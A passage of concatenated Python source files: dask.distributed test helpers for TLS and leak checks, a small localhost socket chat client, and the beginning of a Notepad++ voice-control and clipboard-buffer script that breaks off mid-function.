assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs), assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs), ] await asyncio.gather(*futures) async def assert_can_connect_from_everywhere_6(port, **kwargs): """ Check that the local *port* is reachable from all IPv6 addresses. """ assert has_ipv6() futures = [ assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs), assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs), assert_can_connect("tcp://[::1]:%d" % port, **kwargs), assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs), ] await asyncio.gather(*futures) async def assert_can_connect_locally_6(port, **kwargs): """ Check that the local *port* is only reachable from local IPv6 addresses. """ assert has_ipv6() futures = [ assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs), assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs), assert_can_connect("tcp://[::1]:%d" % port, **kwargs), ] if get_ipv6() != "::1": # No outside IPv6 connectivity? futures += [ assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs) ] await asyncio.gather(*futures) @contextmanager def captured_logger(logger, level=logging.INFO, propagate=None): """Capture output from the given Logger.""" if isinstance(logger, str): logger = logging.getLogger(logger) orig_level = logger.level orig_handlers = logger.handlers[:] if propagate is not None: orig_propagate = logger.propagate logger.propagate = propagate sio = io.StringIO() logger.handlers[:] = [logging.StreamHandler(sio)] logger.setLevel(level) try: yield sio finally: logger.handlers[:] = orig_handlers logger.setLevel(orig_level) if propagate is not None: logger.propagate = orig_propagate @contextmanager def captured_handler(handler): """Capture output from the given logging.StreamHandler.""" assert isinstance(handler, logging.StreamHandler) orig_stream = handler.stream handler.stream = io.StringIO() try: yield handler.stream finally: handler.stream = orig_stream @contextmanager def new_config(new_config): """ Temporarily change configuration dictionary. """ from .config import defaults config = dask.config.config orig_config = copy.deepcopy(config) try: config.clear() config.update(copy.deepcopy(defaults)) dask.config.update(config, new_config) initialize_logging(config) yield finally: config.clear() config.update(orig_config) initialize_logging(config) @contextmanager def new_environment(changes): saved_environ = os.environ.copy() os.environ.update(changes) try: yield finally: os.environ.clear() os.environ.update(saved_environ) @contextmanager def new_config_file(c): """ Temporarily change configuration file to match dictionary *c*. """ import yaml old_file = os.environ.get("DASK_CONFIG") fd, path = tempfile.mkstemp(prefix="dask-config") try: with os.fdopen(fd, "w") as f: f.write(yaml.dump(c)) os.environ["DASK_CONFIG"] = path try: yield finally: if old_file: os.environ["DASK_CONFIG"] = old_file else: del os.environ["DASK_CONFIG"] finally: os.remove(path) certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests")) def get_cert(filename): """ Get the path to one of the test TLS certificates. """ path = os.path.join(certs_dir, filename) assert os.path.exists(path), path return path def tls_config(): """ A functional TLS configuration with our test certs. """ ca_file = get_cert("tls-ca-cert.pem") keycert = get_cert("tls-key-cert.pem") return { "distributed": { "comm": { "tls": { "ca-file": ca_file, "client": {"cert": keycert}, "scheduler": {"cert": keycert}, "worker": {"cert": keycert}, } } } } def tls_only_config(): """ A functional TLS configuration with our test certs, disallowing plain TCP communications. """ c = tls_config() c["distributed"]["comm"]["require-encryption"] = True return c def tls_security(): """ A Security object with proper TLS configuration. """ with new_config(tls_config()): sec = Security() return sec def tls_only_security(): """ A Security object with proper TLS configuration and disallowing plain TCP communications. """ with new_config(tls_only_config()): sec = Security() assert sec.require_encryption return sec def get_server_ssl_context( certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem" ): ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file)) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile)) return ctx def get_client_ssl_context( certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem" ): ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file)) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile)) return ctx def bump_rlimit(limit, desired): resource = pytest.importorskip("resource") try: soft, hard = resource.getrlimit(limit) if soft < desired: resource.setrlimit(limit, (desired, max(hard, desired))) except Exception as e: pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e)) def gen_tls_cluster(**kwargs): kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)]) return gen_cluster( scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs ) @contextmanager def save_sys_modules(): old_modules = sys.modules old_path = sys.path try: yield finally: for i, elem in enumerate(sys.path): if elem not in old_path: del sys.path[i] for elem in sys.modules.keys(): if elem not in old_modules: del sys.modules[elem] @contextmanager def check_thread_leak(): """Context manager to ensure we haven't leaked any threads""" active_threads_start = threading.enumerate() yield start = time() while True: bad_threads = [ thread for thread in threading.enumerate() if thread not in active_threads_start and "Threaded" not in thread.name and "watch message" not in thread.name and "TCP-Executor" not in thread.name # TODO: Make sure profile thread is cleaned up # and remove the line below and "Profile" not in thread.name ] if not bad_threads: break else: sleep(0.01) if time() > start + 5: # Raise an error with information about leaked threads from distributed import profile bad_thread = bad_threads[0] call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident]) assert False, (bad_thread, call_stacks) @contextmanager def check_process_leak(check=True): for proc in mp_context.active_children(): proc.terminate() yield if check: for i in range(200): if not set(mp_context.active_children()): break else: sleep(0.2) else: assert not mp_context.active_children() for proc in mp_context.active_children(): proc.terminate() @contextmanager def check_instances(): Client._instances.clear() Worker._instances.clear() Scheduler._instances.clear() SpecCluster._instances.clear() Worker._initialized_clients.clear() # assert all(n.status == "closed" for n in Nanny._instances), { # n: n.status for n in Nanny._instances # } Nanny._instances.clear() _global_clients.clear() Comm._instances.clear() yield start = time() while set(_global_clients): sleep(0.1) assert time() < start + 10 _global_clients.clear() for w in Worker._instances: with suppress(RuntimeError): # closed IOLoop w.loop.add_callback(w.close, report=False, executor_wait=False) if w.status == Status.running: w.loop.add_callback(w.close) Worker._instances.clear() start = time() while any(c.status != "closed" for c in Worker._initialized_clients): sleep(0.1) assert time() < start + 10 Worker._initialized_clients.clear() for i in range(5): if all(c.closed() for c in Comm._instances): break else: sleep(0.1) else: L = [c for c in Comm._instances if not c.closed()] Comm._instances.clear() print("Unclosed Comms", L) # raise ValueError("Unclosed Comms", L) assert all( n.status == Status.closed or n.status == Status.init for n in Nanny._instances ), {n: n.status for n in Nanny._instances} # assert not list(SpecCluster._instances) # TODO assert all(c.status == Status.closed for c in SpecCluster._instances), list( SpecCluster._instances ) SpecCluster._instances.clear() Nanny._instances.clear() DequeHandler.clear_all_instances() @contextmanager def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True): with check_thread_leak() if threads else nullcontext(): with pristine_loop() as loop: with check_process_leak(check=processes): with check_instances() if instances else nullcontext(): with check_active_rpc(loop, timeout): reset_config() dask.config.set({"distributed.comm.timeouts.connect": "5s"}) # Restore default logging levels # XXX use pytest hooks/fixtures instead? for name, level in logging_levels.items(): logging.getLogger(name).setLevel(level) yield loop with suppress(AttributeError): del thread_state.on_event_loop_thread @pytest.fixture def cleanup(): with clean(): yield class TaskStateMetadataPlugin(WorkerPlugin): """WorkPlugin to populate TaskState.metadata""" def setup(self, worker): self.worker = worker def transition(self, key, start, finish, **kwargs): ts = self.worker.tasks[key] if start == "ready" and finish == "executing": ts.metadata["start_time"] = time() elif start == "executing" and finish == "memory": ts.metadata["stop_time"] = time()
client.py
import socket,threading # Choosing Nickname nickname = input("Choose your nickname: ") # Connecting To Server client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect(('127.0.0.1', 55555)) # Listening to Server and Sending Nickname def receive(): while True: try: # Receive Message From Server # If 'NICK' Send Nickname message = client.recv(1024).decode('ascii') if message == 'NICK': client.send(nickname.encode('ascii')) else: print(message) except: # Close Connection When Error print("An error occured!") client.close() break # Sending Messages To Server def write(): while True: message = '{}: {}'.format(nickname, input('')) client.send(message.encode('ascii')) # Starting Threads For Listening And Writing receive_thread = threading.Thread(target=receive) receive_thread.start() write_thread = threading.Thread(target=write) write_thread.start()
npp_dragonfly.py
import subprocess; import threading; from threading import Thread; import time; import sys; import os; import re; import jellyfish; import lxml; from lxml import etree; import sqlite3; import traceback; import socket from fuzzy_string_comparison import get_closest_match; import win32clipboard; try: import tinycss; except: pass; def set_cb(t): win32clipboard.OpenClipboard(); win32clipboard.EmptyClipboard(); win32clipboard.SetClipboardData(1,t); win32clipboard.CloseClipboard(); def get_cb(): win32clipboard.OpenClipboard(); r = win32clipboard.GetClipboardData(); win32clipboard.CloseClipboard(); return r; def get_dirname(fn): tf = fn.rfind("/"); tf2 = fn.rfind("\\"); if(tf2 > tf): tf = tf2; if(tf == -1): return ""; dir = fn[0:tf]; return dir; current_lang = "python"; dm = {}; icb_max = 5; cb_buff = 0; cb_page_default = "default"; cb_page = cb_page_default; cb_page_auto_detect = True; cb_page_map = {}; cb_page_bmap = {}; cb_list_flag = -1; internal_cb = [""] * icb_max; paste_port = 36555; cmd_port = 36556; paste_send_port = 35555; cmd_send_port = 35556; rcv_port_list = [paste_port,cmd_port]; global dsep; dsep = "###<<<>>>###"; global serv_path; serv_path = ""; try: serv_path = os.environ["NPP_DRAGON"]; except: print "NPP_DRAGON ENVIRONMENTAL VARIABLE ISN'T SETUP"; exit(); raw = "python"; try: with open(serv_path+"\\grammar\\context.txt","r+") as f: raw = f.read(); raw.replace("\n","").replace("\r","").replace("\t","").replace(" ","").lower(); except: pass; current_lang = raw; global ed; ed = editor; global mark_time; mark_time = int(time.time()); global is_running; is_running = True; global esep; esep = "###!!||!!###"; auto_lang = True; # r = re.compile(r'[0-9_]*[a-zA-Z]+[0-9_]*'); global action_map; action_map = {}; def cur_line_num(ed): cpos = ed.getCurrentPos(); lc = ed.getLineCount(); ln = 0; for i in range(0,lc): le = ed.getLineEndPosition(i); ln = i; if(le >= cpos): return ln; return ln; def backspace(x=1): global ed; for i in range(0,x): ed.deleteBack(); action_map["backspace"] = backspace; def move_left(x=1): global ed; tpos = int(ed.getCurrentPos()); tpos -= x; if(tpos < 0): tpos = 0; ed.gotoPos(tpos); action_map["left"] = move_left; def move_right(x=1): global ed; tpos = int(ed.getCurrentPos()); tpos += x; ed.gotoPos(tpos); action_map["right"] = move_right; def move_up(x=1): global ed; for i in range(0,x): ed.lineUp(); action_map["up"] = move_up; def move_down(x=1): global ed; for i in range(0,x): ed.lineDown(); action_map["down"] = move_down; def doc_top(x=1): global ed; ed.documentStart(); action_map["doc_top"] = doc_top; def doc_bot(x=1): global ed; ed.documentEnd(); action_map["doc_bot"] = doc_bot; def line_start(x=1): global ed; cln = cur_line_num(ed); cln -= 1; tpos = 0; if(cln > 0): tpos = ed.getLineEndPosition(cln) + 2; ed.gotoPos(tpos); action_map["line_start"] = line_start; def line_end(x=1): global ed; ed.lineEnd(); action_map["line_end"] = line_end; def container_nav(x=1,type=0,direction=0,targ="(",targ2=")"): global ed; tlen = int(Editor.getTextLength(ed)); tpos = int(ed.getCurrentPos()); txt = ""; p = -1; if(direction == 1): # Right txt = Editor.getTextRange(editor,tpos,tlen); y = 0 #Console.write(console,"LEN: "+str(len(txt))+"\n"); for i in range(0,x): y = txt.find(targ,y); if(y != -1): p = y; y += len(targ); p += tpos; #Console.write(console,"pos: "+str(p)+"\n\n"); elif(direction == 0): # Left txt = Editor.getTextRange(editor,0,tpos); y = len(txt); for i in range(0,x): y = txt[:y].rfind(targ); if(y != -1): p = y; #Console.write(console,"type: "+str(type)+"\n\n"); cstack = []; # container stack wdw_size = 500; # window size wdw = ""; wdw_i = 0; cpos = p; if(p != -1): if(type == 0): # Move cursor to just inside the container. ed.gotoPos(p+1); elif(type == 1): nlf = False; # Move cursor to first line after bracket... cpos = p+1 while(cpos < tlen): if(wdw_i >= len(wdw)): rem = tlen - cpos; tws = wdw_size; if(rem < tws): tws = rem; wdw = Editor.getTextRange(editor,cpos,cpos+tws); wdw_i = 0; c = wdw[wdw_i]; wdw_i += 1; if((nlf) and not((c == " ")or(c == "\t"))): #Console.write(console,"nlf: [pos: "+str(cpos)+"] ("+str(ord(c))+") "+str(c)+"\n\n"); break; if(c == "\n"): nlf = True; if(c == targ): cstack.append(targ); elif(c == targ2): if targ in cstack: cstack.remove(targ); else: break; cpos += 1; if((cpos == tlen) or nlf): #Console.write(console,"goto: [pos: "+str(cpos)+"]\n\n"); ed.gotoPos(cpos); elif(type == 2): # Find last line after open container. cpos = p+1 tln = p+1; #Console.write(console,"targs: "+targ+" "+targ2+"\n\n"); while(cpos < tlen): if(wdw_i >= len(wdw)): rem = tlen - cpos; tws = wdw_size; if(rem < tws): tws = rem; wdw = Editor.getTextRange(editor,cpos,cpos+tws); wdw_i = 0; c = wdw[wdw_i]; wdw_i += 1; if(c == "\n"): tln = cpos; #Console.write(console,"tln: [pos: "+str(cpos)+"] ("+str(ord(c))+") "+str(c)+"\n\n"); if(c == targ): cstack.append(targ); elif(c == targ2): if targ in cstack: cstack.remove(targ); else: break; cpos += 1; if(cpos != tlen): #Console.write(console,"goto: [pos: "+str(cpos)+"]\n\n"); ed.gotoPos(tln); elif(type == 3): # Goto just inside closing container symbol. cpos = p+1 while(cpos < tlen): if(wdw_i >= len(wdw)): rem = tlen - cpos; tws = wdw_size; if(rem < tws): tws = rem; wdw = Editor.getTextRange(editor,cpos,cpos+tws); wdw_i = 0; c = wdw[wdw_i]; wdw_i += 1; if(c == targ): cstack.append(targ); elif(c == targ2): if targ in cstack: cstack.remove(targ); else: break; cpos += 1; if(cpos != tlen): ed.gotoPos(cpos); def paren_nav_left(x=1,type=0): container_nav(x,type,0,"(",")"); action_map["paren_nav_left"] = paren_nav_left; def paren_nav_right(x=1,type=0): container_nav(x,type,1,"(",")"); action_map["paren_nav_right"] = paren_nav_right; def square_nav_left(x=1,type=0): container_nav(x,type,0,"[","]"); action_map["square_nav_left"] = square_nav_left; def square_nav_right(x=1,type=0): container_nav(x,type,1,"[","]"); action_map["square_nav_right"] = square_nav_right; def curly_nav_left(x=1,type=0): container_nav(x,type,0,"{","}"); action_map["curly_nav_left"] = curly_nav_left; def curly_nav_right(x=1,type=0): container_nav(x,type,1,"{","}"); action_map["curly_nav_right"] = curly_nav_right; def angle_nav_left(x=1,type=0): container_nav(x,type,0,"<",">"); action_map["angle_nav_left"] = angle_nav_left; def angle_nav_right(x=1,type=0): container_nav(x,type,1,"<",">"); action_map["angle_nav_right"] = angle_nav_right; def save_source_file(x=1): global ed; Notepad.menuCommand(notepad,41006); action_map["save_source_file"] = save_source_file; def s_cut(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_list_flag; global internal_cb; global serv_path; ss = Editor.getSelectionStart(editor); se = Editor.getSelectionEnd(editor); txt = Editor.getTextRange(editor,ss,se); internal_cb[cb_buff] = txt; set_cb(internal_cb[cb_buff]); # Save to sqlite3 db. try: with open(serv_path+"\\clipboard\\buffer.data","w+") as f: f.write(txt); f.flush(); except: pass; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":copy",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"copy: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); sss = ed.getSelectionStart(); sse = ed.getSelectionEnd(); if(sss != sse): ed.deleteBack(); action_map["cut"] = s_cut; def s_copy(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_list_flag; global internal_cb; global serv_path; ss = Editor.getSelectionStart(editor); se = Editor.getSelectionEnd(editor); txt = Editor.getTextRange(editor,ss,se); internal_cb[cb_buff] = txt; set_cb(internal_cb[cb_buff]); # Save to sqlite3 db. try: with open(serv_path+"\\clipboard\\buffer.data","w+") as f: f.write(txt); f.flush(); except: pass; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":copy",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"copy: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["copy"] = s_copy; def s_paste(x=1): global ed; global icb_max; global cb_buff; global internal_cb; sss = ed.getSelectionStart(); sse = ed.getSelectionEnd(); if(sss != sse): ed.deleteBack(); ed.addText(internal_cb[cb_buff]); action_map["paste"] = s_paste; def clone(x=1): global ed; global icb_max; global cb_buff; global internal_cb; ss = Editor.getSelectionStart(editor); se = Editor.getSelectionEnd(editor); txt = Editor.getTextRange(editor,ss,se); ed.lineEnd(); ed.addText("\n%s" % txt); action_map["clone"] = clone; def clipboard_list(x=-1,y=0): global ed; global icb_max; global cb_buff; global internal_cb; global serv_path; global cb_list_flag; cb_list_flag = x; tfn = serv_path+"\\clipboard\\clipboard.ini" txt = ""; if(x == -1): for i in range(0,icb_max): p = " "; if(i == cb_buff): p = "[ACTIVE]"; txt = "%s%s" % (txt,"\n# ======================================"); txt = "%s%s%s%s%s" % (txt,"\n# ",p," BUFFER ",str(i+1)); txt = "%s%s" % (txt,"\n# ======================================\n"); txt = "%s%s\n" % (txt,internal_cb[i]); else: i = cb_buff; y = -1; try: y = int(x) - 1; except: pass; if((y >= 0) and (y < icb_max)): i = y; txt = "%s%s" % (txt,"\n# ======================================"); txt = "%s%s%s%s" % (txt,"\n# "," BUFFER ",str(i+1)); txt = "%s%s" % (txt,"\n# ======================================\n"); txt = "%s%s\n" % (txt,internal_cb[i]); try: with open(tfn,"w+") as f: f.write(txt.replace("\r", "")); f.flush(); except: pass; # Notepad.menuCommand(notepad,44072); # switch views. #Console.write(console,txt); #print tfn; fl = Notepad.getFiles(notepad); efl = []; efd = {}; if(x == 0): for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn in efl): cbid = Notepad.getCurrentBufferID(notepad); Notepad.activateBufferID(notepad,efd[tfn]); Notepad.close(notepad); Notepad.activateBufferID(notepad,cbid); try: with open(tfn,"w+") as f: f.write(""); f.flush(); except: pass; time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); vbid = None; fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn not in efl): if(y == 0): Notepad.open(notepad,tfn); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); else: if(y != 0): Notepad.menuCommand(notepad,44072); # switch views. vbid = Notepad.getCurrentBufferID(notepad); if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,efd[tfn]); else: Notepad.activateBufferID(notepad,efd[tfn]); ed.setText(txt); Notepad.menuCommand(notepad,41006); if(y != 0): if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,vbid); Notepad.activateBufferID(notepad,cbid); action_map["clipboard_list"] = clipboard_list; def clipboard_up(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_page_bmap; global cb_list_flag; global internal_cb; if((cb_buff - 1) < 0): if((icb_max - 1) < 0): cb_buff = 0; set_cb(internal_cb[cb_buff]); else: cb_buff = icb_max - 1; set_cb(internal_cb[cb_buff]); else: cb_buff -= 1; set_cb(internal_cb[cb_buff]); # Save updated position to sqlite3 db. cb_page_bmap[cb_page][3] = cb_buff + 1; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":activebuffid",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"buffer position update: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["clipboard_up"] = clipboard_up; def clipboard_down(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_page_bmap; global cb_list_flag; global internal_cb; if((cb_buff + 1) >= icb_max): cb_buff = 0; set_cb(internal_cb[cb_buff]); else: cb_buff += 1; set_cb(internal_cb[cb_buff]); # Save updated position to sqlite3 db. cb_page_bmap[cb_page][3] = cb_buff + 1; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":activebuffid",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"buffer position update: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["clipboard_down"] = clipboard_down; def clipboard_select(x=1): global ed; global icb_max; global cb_buff; global cb_page; global cb_page_bmap; global cb_list_flag; global internal_cb; try: y = int(x) - 1; if((y > 0) and (y < icb_max)): cb_buff = y; set_cb(internal_cb[cb_buff]); except: pass; # Save updated position to sqlite3 db. cb_page_bmap[cb_page][3] = cb_buff + 1; sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":activebuffid",str(cb_page),":buffer",str(cb_buff+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; Console.write(console,"buffer position update: [page: "+str(cb_page)+" buffer: "+str(cb_buff+1)+"] "+raw+"\n"); except: pass; clipboard_list(cb_list_flag,1); action_map["clipboard_select"] = clipboard_select; def clipboard_auto(x=-1): global ed; global icb_max; global cb_buff; global internal_cb; global cb_page_auto_detect; if(x == 1): cb_page_auto_detect = True; with open(serv_path+"\\clipboard\\autopage.ini","w+") as f: f.write("1"); f.flush(); elif(x == 0): cb_page_auto_detect = False; with open(serv_path+"\\clipboard\\autopage.ini","w+") as f: f.write("0"); f.flush(); action_map["clipboard_auto"] = clipboard_auto; def clipboard_page_list(x=1,y=0): global ed; global icb_max; global cb_buff; global internal_cb; global serv_path; global cb_page_bmap; tfn = serv_path+"\\clipboard\\clipboard_page.ini" txt = ""; for k,v in cb_page_bmap.iteritems(): p = " "; if(k == cb_page): p = "[ACTIVE]"; txt = "%s%s%s = %s\n" % (txt,p,k,v[2]); try: with open(tfn,"w+") as f: f.write(txt.replace("\r", "")); f.flush(); except: pass; #Console.write(console,txt); #print tfn; if(x != 1): fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn in efl): cbid = Notepad.getCurrentBufferID(notepad); Notepad.activateBufferID(notepad,efd[tfn]); Notepad.close(notepad); Notepad.activateBufferID(notepad,cbid); try: with open(tfn,"w+") as f: f.write(""); f.flush(); except: pass; time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); vbid = None; fl = Notepad.getFiles(notepad); efl = []; efd = {}; for f in fl: efl.append(f[0]); efd[f[0]] = f[1]; if(tfn not in efl): if(y == 0): Notepad.open(notepad,tfn); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); else: if(y != 0): Notepad.menuCommand(notepad,44072); # switch views. vbid = Notepad.getCurrentBufferID(notepad); if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,efd[tfn]); else: Notepad.activateBufferID(notepad,efd[tfn]); ed.setText(txt); Notepad.menuCommand(notepad,41006); if(y != 0): if(vbid != efd[tfn]): Notepad.activateBufferID(notepad,vbid); Notepad.activateBufferID(notepad,cbid); action_map["clipboard_page_list"] = clipboard_page_list; def inject_doctype(x=-1): global ed; if(x == 1): ed.addText('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'); elif(x == 2): ed.addText('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">'); action_map["inject_doctype"] = inject_doctype; # ACTIONS END HERE # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def snippet_display_name_list(txt): global ed; global serv_path; filename = serv_path+"\\snippets\\snippet_page.ini" with open(filename,"w+") as file_stream: file_stream.write(txt); file_stream.flush(); filelist = Notepad.getFiles(notepad); temp_filelist = []; temp_filemap = {}; for file_object in filelist: temp_filelist.append(file_object[0]); temp_filemap[file_object[0]] = file_object[1]; if(filename in temp_filelist): cbid = Notepad.getCurrentBufferID(notepad); Notepad.activateBufferID(notepad,temp_filemap[filename]); Notepad.close(notepad); Notepad.activateBufferID(notepad,cbid); time.sleep(0.1); else: cbid = Notepad.getCurrentBufferID(notepad); Notepad.open(notepad,filename); Notepad.menuCommand(notepad,10001); Notepad.activateBufferID(notepad,cbid); def navigate(nav_path): global ed; global action_map; ns = nav_path.split(","); for x in ns: m = x.split(":"); an = m[0]; rp = 1; if(len(m) > 1): try: rp = int(m[1]); except: rp = 1; if(an in action_map): action_map[an](rp); def cleaner(_raw): global esep; ssep = "###)))(((###"; rez = (False,None); raw = ""; rrr = _raw.split(esep); rrrl = len(rrr); if(rrrl < 2): return rez; es = ""; for i in range(0,rrrl - 1): x = rrr[i]; raw += es + x; es = esep; r = raw.split(ssep); rl = len(r); if(rl < 2): return rez; res = ""; sep = ""; for i in range(1,rl): res += sep + str(r[i]); sep = ssep; rez = (True,res); return rez; def format_props(p_raw): psep = "###>>><<<###"; ksep = "###((()))###"; ps = p_raw.split(psep); d = {}; for p in ps: kv = p.split(ksep); if((len(kv) < 2) or (kv[0] == "")): continue; d[kv[0]] = kv[1]; return d; def format_msg(data): global esep; rez = (None,None); dsep = "###<<<>>>###"; ssep = "###)))(((###"; r = data.split(dsep); msg = r[0]; rl = len(r); if((rl < 2)or(r[1] == "")): return (msg,{}); p_raw = r[1]; """ d = {}; ps = p_raw.split(psep); for p in ps: kv = p.split(ksep); if((len(kv) < 2) or (kv[0] == "")): continue; d[kv[0]] = kv[1]; """ rez = (msg,format_props(p_raw)); return rez; def check_dt_dups(): now = int(time.time()); max_diff = 2; # 2 seconds. fn = "E:\\usr\\nppserve\\npp_check.txt"; f = open(fn,"r+"); x = 0; xs = f.readline(); if(xs != ""): x = int(xs); f.close(); if((now - x) > max_diff): return True; return False; def mark_dt(): now = int(time.time()); fn = "E:\\usr\\nppserve\\npp_check.txt"; f = open(fn,"w+"); f.write(str(now)+"\n"); f.flush(); f.close(); def dragon_guard_thread(): global is_running; while(is_running): mark_dt(); time.sleep(0.5); msg_queue = []; def dragon_thread(): global ed; global is_running; global esep; global action_map; global msg_queue; global atom_list; global atom_map; global bm; global auto_lang; global serv_path; global esep; global icb_max; global cb_buff; global internal_cb; global cb_page_map; global cb_page_bmap; global cb_page_default; global cb_page; global cb_list_flag; global current_lang; global dm; if(not check_dt_dups()): is_running = False; return False; mem_re = re.compile("\|[^|]*\|"); connav_re = re.compile("\:rp[0-9]+"); #print "test point 2"; tmp = ""; ssep = "###)))(((###"; Thread(target=dragon_guard_thread).start(); while(is_running): time.sleep(0.05); mm = None; if(len(msg_queue) > 0): mm = msg_queue.pop(0) else: continue; msg = mm[0].replace(ssep,""); props = mm[1]; for k,v in props.iteritems(): props[k] = v.replace(esep,""); #print msg, props; cln = cur_line_num(ed); if(("type" not in props) or (props["type"] == "add_text")): indent = "inherit"; if("indent" in props): indent = props["indent"]; lines = msg.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); if(indent != "inherit"): tc = 0; m = ""; tabs = "\t" * tc; sep = "\n%s" % tabs; for x in lines: m += prep + x; prep = sep; # Pre-navigation if("pre_nav" in props): navigate(props["pre_nav"]); ed.addText(m); # Post-navigation if("post_nav" in props): navigate(props["post_nav"]); elif("type" in props): mtype = props["type"]; if(mtype == "action"): m = msg.split(":"); an = m[0]; rp = 1; if(len(m) > 1): try: rp = int(m[1]); except: rp = 1; if(an in action_map): action_map[an](rp); elif(mtype == "memcomplete"): try: c_lang = current_lang; if(c_lang in dm): c_lang = dm[c_lang]; indent = "inherit"; if("indent" in props): indent = props["indent"]; lines = msg.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); if(indent != "inherit"): tc = 0; m = ""; for x in lines: m += prep + x; prep = "\n" + ("\t" * tc); msg = m; #print msg; #Console.write(console,str(bm)+"\n\n\n\n---------\n\n\n"); buff_id = Notepad.getCurrentBufferID(notepad); memtype = [["var"]]; pre = msg[0]; if("memtype" in props): try: mtl = props["memtype"].split("|"); memtype = []; for mt in mtl: mtc = mt.split(","); mtsl = []; memtype.append(mtsl); for ms in mtc: try: n = ms.replace("\n","").replace("\r","").replace("\t","").replace(" ",""); mtsl.append(n); except: pass; pass; except: memtype = [["var"]]; t = msg; result = msg; tf = mem_re.search(t); tfl = []; while(tf != None): tfl.append(t[(tf.start()+1):(tf.end()-1)]); tf = mem_re.search(t,tf.end()+1); tfc = len(tfl); tmp = None; for mt in memtype: if(len(mt) == tfc): tmp = mt; break; memtype = tmp; if((memtype != None) and (tfc > 0)): for i in range(0,tfc): mt = memtype[i]; #Console.write(console,str(c_lang)+"\n\n\n-----\n\n"); #Console.write(console,str(bm[buff_id][c_lang])+"\n====\n\n"); al = []; bl = []; try: for ax in bm[buff_id][c_lang]["alias"][mt].iterkeys(): al.append(ax); bl.append(ax); except: pass; for ax in bm[buff_id][c_lang][mt]: if(ax not in bl): bl.append(ax); tm = tfl; m = tm[0]; 